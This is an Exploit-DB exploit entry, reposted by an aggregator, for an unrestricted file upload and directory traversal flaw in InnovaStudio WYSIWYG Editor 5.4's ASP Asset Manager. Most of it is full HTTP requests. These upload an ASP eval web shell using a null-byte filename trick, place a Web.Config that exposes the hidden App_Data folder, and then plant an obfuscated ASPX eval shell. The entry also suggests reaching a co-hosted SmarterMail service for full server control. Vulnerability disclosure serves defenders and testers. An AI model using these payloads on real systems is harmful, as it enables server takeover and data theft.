[webapps] InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal
2023-4-14 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:19 收藏

Platform:

ASP

Date:

2023-04-14



# Exploit Title: InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal
# Date: 11/04/2023
# Exploit Author: Zer0FauLT [[email protected]]
# Vendor Homepage: innovastudio.com
# Product: Asset Manager
# Version: <= Asset Manager ASP Version 5.4
# Tested on: Windows 10 and Windows Server 2019
# CVE : 0DAY

##################################################################################################
#                                                                                                #
#                    ASP version, in i_upload_object_FSO.asp, line 234                           #
#                                                                                                #
#              oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt"                  #
#                                                                                                #
##################################################################################################
||==============================================================================||
||                                    ((((1))))                                 ||
||                                                                              ||
||  ...:::We Trying Upload ASP-ASPX-PHP-CER-OTHER SHELL FILE EXTENSIONS:::...   ||
||==============================================================================||
##################################################################################################
"                                                                                                "
"                             FILE PERMISSIONS : [ 0644 ]                                        "
"                                                                                                "
"                             DIR PERMISSIONS  : [ 0755 ]                                        "
"                                                                                                "
"        UPLOAD FOLDER    : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ]             "
"                                                                                                "
##################################################################################################

==================================================================================================

POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"

C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"


------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp"
Content-Type: application/octet-stream

<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--

==================================================================================================
"                                   ...[ RESPONCE ]...                                           "
"                                                                                                "
"           ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed.                      "
"                                                                                                "
==================================================================================================

                                          ***
											
||================================================================================||
||                                    ((((2))))                                   ||
||                                                                                ||
||  ...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::...  ||
||                                                                                ||
||================================================================================||
##################################################################################################
"                                                                                                "
"                             FILE PERMISSIONS : [ 0644 ]                                        "
"                                                                                                "
"                             DIR PERMISSIONS  : [ 0755 ]                                        "
"                                                                                                "
"        UPLOAD FOLDER    : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ]             "
"                                                                                                "
##################################################################################################

==================================================================================================

POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"

C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"


------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt"
Content-Type: application/octet-stream

<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--

==================================================================================================
"                            >>> filename="shell.asp%00asp.txt" <<<                              "
"                                                                                                "
"   [ %00 ] ===> We select these values > Right Click > Convert Selecetion > URL > URL-decode    "
"                                                                                                "
"                                            or                                                  "
"                                                                                                "
"                                       CTRL+Shift+U                                             "
"                                                                                                "
"                                           SEND!                                                "
"                                                                                                "
==================================================================================================
"                                   ...[ RESPONCE ]...                                           "
"                                                                                                "
"		                           OK!                                                   "
"                                                                                                "
"      UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ]       "
"                                                                                                "
" SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted]        "
"                                                                                                "                        
==================================================================================================

                                            ***
											
||==============================================================================||
||                                    ((((3))))                                 ||
||                                                                              ||
||                        ...:::NO WRITE PERMISSION!:::...                      ||
||                                                                              ||
||                         ...:::Directory Traversal:::...                      ||
||                                                                              ||
||==============================================================================||
##################################################################################################
"                                                                                                "
"           FILE PERMISSIONS                          : [ 0600 ]                                 "
"                                                                                                "
"           DEFAULT DIR[\Editor\assets] PERMISSIONS   : [ 0700 ]                                 "
"                                                                                                "
"           OTHER[App_Data] DIR PERMISSIONS           : [ 0777 ]                                 "
"                                                                                                "
"     DEFAULT FOLDER      : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ]             "
"                                                                                                "
"     App_Data FOLDER     : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ]                  "
"                                                                                                "
"     TEST WORK DIR       :  https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ]           "
"                                                                                                "
"                                                                                                "
##################################################################################################
##########################################################################################################################################################
#                                                                                                                                                        #											
#                                               What is the App_Data Folder useful?                                                                      #
# App_Data contains application data files including .mdf database files, XML files, and other data store files.                                         #
# The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. #
# The App_Data folder is not public like the other website directories under the Home Directory.                                                         #
# Because it's a private directory, the IIS server hides it for security reasons.                                                                        #
# Now, we will test whether such a directory exists.                                                                                                     #
# If the directory exists, we will make it public so that we can define the necessary server functions for running a shell within it.                    #
# For this we will try to load a special server configuration file. This is a Web.Config file. With this we'll ByPass the directory privacy.             #
# So the directory will be public and it will be able to respond to external queries and run a shell.                                                    # 
#                                                                                                                                                        #                                                                                                                                             
##########################################################################################################################################################
==================================================================================================

POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"

C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"


------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt"
Content-Type: application/octet-stream

<configuration>
 <system.webServer>
<defaultDocument>
<files>
<add value="*.asp" />
<add value="*.aspx" />
<add value="*.php" />
</files>
</defaultDocument>
<security>
   <requestFiltering>
    <hiddenSegments>
     <clear />
    </hiddenSegments>
   </requestFiltering>
  </security>
 </system.webServer>
</configuration>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--

==================================================================================================
"                                   ...[ RESPONCE ]...                                           "
"                                                                                                "
"		                           OK!                                                   "
"                                                                                                "
"  UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ]               "
"                                                                                                "
"  TEST WORK for App_Data DIR :  https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ]       "
"                                                                                                "                        
==================================================================================================
#               Now we will upload your shell to the directory where we made ByPass.             #
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"

C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"


------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt"
Content-Type: application/octet-stream

<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %>
<%var PAY:String=
Request["\x61\x62\x63\x64"];eval
(PAY,"\x75\x6E\x73\x61"+
"\x66\x65");%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--

======================================================================================================
"                                   ...[ RESPONCE ]...                                               "
"                                                                                                    "
"		                           OK!                                                       "
"                                                                                                    "
"  UPLOADED FOLDER     : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ]              "
"                                                                                                    "
"  TEST WORK for Shell :  https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ]                   "
"                                                                                                    "                        
==========================================================================================================================================
"                                                                                                                                        "
" So what can we do if no directory on the site has write permission?                                                                    "
" If not, we will test for vulnerabilities in the paths of other applications running on the server.                                     "
" Sometimes this can be a mail service related vulnerability,                                                                            "
" Sometimes also it can be a "Service Permissions" vulnerability.                                                                        "
" Sometimes also it can be a "Binary Permissions " vulnerability.                                                                        "
" Sometimes also it can be a "Weak Service Permissions" vulnerability.                                                                   "
" Sometimes also it can be a "Unquoted Service Path" vulnerability.                                                                      "
" Our limits are as much as our imagination...                                                                                           "
"                                                  ***  0DAY  ***                                                                        "
" Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service.                                      "                 
" We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service. "
" TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ]                                                   "
" Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ]                                  "
" As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service,                                  "
" And then upload our shell file to the server by bypassing it.                                                                          "
" This way, we will have full control over both the server and the mail service.                                                         "
" Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ]                                                                            "
"                                                                                                                                        "
==========================================================================================================================================
            

文章来源: https://www.exploit-db.com/exploits/51362
如有侵权请联系:admin#unsafe.sh